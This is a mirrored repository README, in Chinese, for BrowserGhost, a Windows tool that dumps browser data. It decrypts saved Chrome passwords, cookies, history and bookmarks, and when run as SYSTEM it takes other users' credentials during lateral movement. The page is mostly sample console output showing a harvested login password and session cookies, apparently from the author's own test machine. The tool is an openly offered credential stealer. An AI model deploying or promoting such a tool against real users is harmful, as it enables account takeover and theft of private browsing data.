qwqdanchun
/
BrowserGhost
mirror of https://github.com/qwqdanchun/BrowserGhost.git
1
0
Fork 0
Code Issues Projects Releases Wiki Activity
BrowserGhost/README.md

105 lines
4.2 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# BrowserGhost
## 介绍:
这是一个抓取浏览器密码的工具,后续会添加更多功能
## 当前已经完成的功能:
- 实现system抓机器上其他用户的浏览器密码(方便横向移动时快速凭据采集)
- 用.net2 实现可兼容大部分windows并去掉依赖(不需要System.Data.SQLite.dll这些累赘)
- 可以解密chrome全版本密码(chrome80版本后加密方式变了)
- 已经可以获取login data、cookie、history、book了
## 即将去做:
- 优化输出
- 监控实时cookie
- 兼容主流浏览器(ie、firefox、360极速浏览器等)
```
C:\Users\Administrator\Desktop>BrowserGhost.exe
[+] Current user Administrator
[*] [1176] [explorer] [Administrator]
[*] Impersonate user Administrator
[*] Current user Administrator
[*] Start Get Chrome Login Data
[+] Copy C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Login Data to C:\Users\Administrator\AppData\Local\Temp\tmp1B7D.tmp
[URL] -> https://github.com/login
[USERNAME] -> n0thing@gmail.com
[PASSWORD] -> Iloveprettygirls
[+] Delete File C:\Users\Administrator\AppData\Local\Temp\tmp1B7D.tmp
[*] Start Get Chrome Bookmarks
{
"checksum": "c2ed0a404ff1dce21f0a229055b7cb36",
"roots": {
"bookmark_bar": {
"children": [ {
"date_added": "13236485210177330",
"guid": "4858fd46-732b-4756-b27f-7d89efaff625",
"id": "5",
"name": "The worlds leading software development platform · GitHub",
"type": "url",
"url": "https://github.com/"
} ],
"date_added": "13236485205390236",
"date_modified": "13236485210177330",
"guid": "00000000-0000-4000-a000-000000000002",
"id": "1",
"name": "书签栏",
"type": "folder"
},
"other": {
"children": [ ],
"date_added": "13236485205390251",
"date_modified": "0",
"guid": "00000000-0000-4000-a000-000000000003",
"id": "2",
"name": "其他书签",
"type": "folder"
},
"synced": {
"children": [ ],
"date_added": "13236485205390252",
"date_modified": "0",
"guid": "00000000-0000-4000-a000-000000000004",
"id": "3",
"name": "移动设备书签",
"type": "folder"
}
},
"version": 1
}
[*] Start Get Chrome Cookie
[+] Copy C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Cookies to C:\Users\Administrator\AppData\Local\Temp\tmp1C1A.tmp
[.github.com] _octo=GH1.1.434863639.1591963566
[.github.com] logged_in=no
[github.com] _device_id=4a24785d8dccc12f062fb54c881820f3
[.github.com] _ga=GA1.2.1739362774.1591963568
[.google.com] 1P_JAR=2020-06-13-01
[.google.com.hk] 1P_JAR=2020-06-13-01
[.google.com] NID=204=bwGOYwnjfPBO2P6zRXqDBEFehuBPeyyf0AWBA8EIK22lqIgMvVtcu86OmszFqdooyW1JwrUQ2K4zIblpfJpxOMmj6Nrq-ofA1rNfOV5Wt5EB9l-qJOTuMTW5NMaZh2ofU-trKn_zHbWlVoUgkUnEFStR1Hl8w4rAu1rSyDKBVB0
[.google.com.hk] NID=204=K52w3WF9SZvbXw3sHwtQorzsLgyea_zafqVBrvkVatVJcKhOZbmMdUst2phNuQFu2oX4dJ3lYOcYlH7y5oo_aHDIiZu2LGOxt8scFmRrU7GrVu_0kQd6PJlErsgtPiUIIRIhQcskj09LdRYq-NJx7iM6eVsRLhS75c_aClm12eE
[github.com] _gh_sess=%2FelMYjTKT2jbqyRmUxwWNQC1DINuIy1CGbROibLbmmb4Y089cdHVRBrFia7ANm4e4UaK43QyNqujiEnnUzqViHxUe4QQhMgkId2V9AWkuc3zkElsz%2BuwIf4wJ1OQ1oc9J29QEyiz4SCwcXGj3d2eP7dzO8lf6Sjoerxo65afoHZ1sxs4Xl6UBthqpQcw4I95e5UXM4IJOvFHZ9qZEW4SytmX6DaEMVwD%2BsUKrfWSySxPmtFw3HhfDEpug6A00jPNiqBYbaS32YYyXfWcSKrZyA%3D%3D--DiSJEFqTgEoZ8IqK--Eq99ToeLqWcNBv%2BSFi6Y2g%3D%3D
[.github.com] tz=Asia%2FShanghai
[+] Delete File C:\Users\Administrator\AppData\Local\Temp\tmp1C1A.tmp
[*] Start Get Chrome History
[+] Copy C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\History to C:\Users\Administrator\AppData\Local\Temp\tmp1C3A.tmp
http://github.com/ The worlds leading software development platform · GitHub
https://github.com/ The worlds leading software development platform · GitHub
https://github.com/login Sign in to GitHub · GitHub
https://github.com/session Sign in to GitHub · GitHub
[+] Delete File C:\Users\Administrator\AppData\Local\Temp\tmp1C3A.tmp
[*] Recvtoself
[*] Current user Administrator
```
![](2.png)
Reference in New Issue View Git Blame Copy Permalink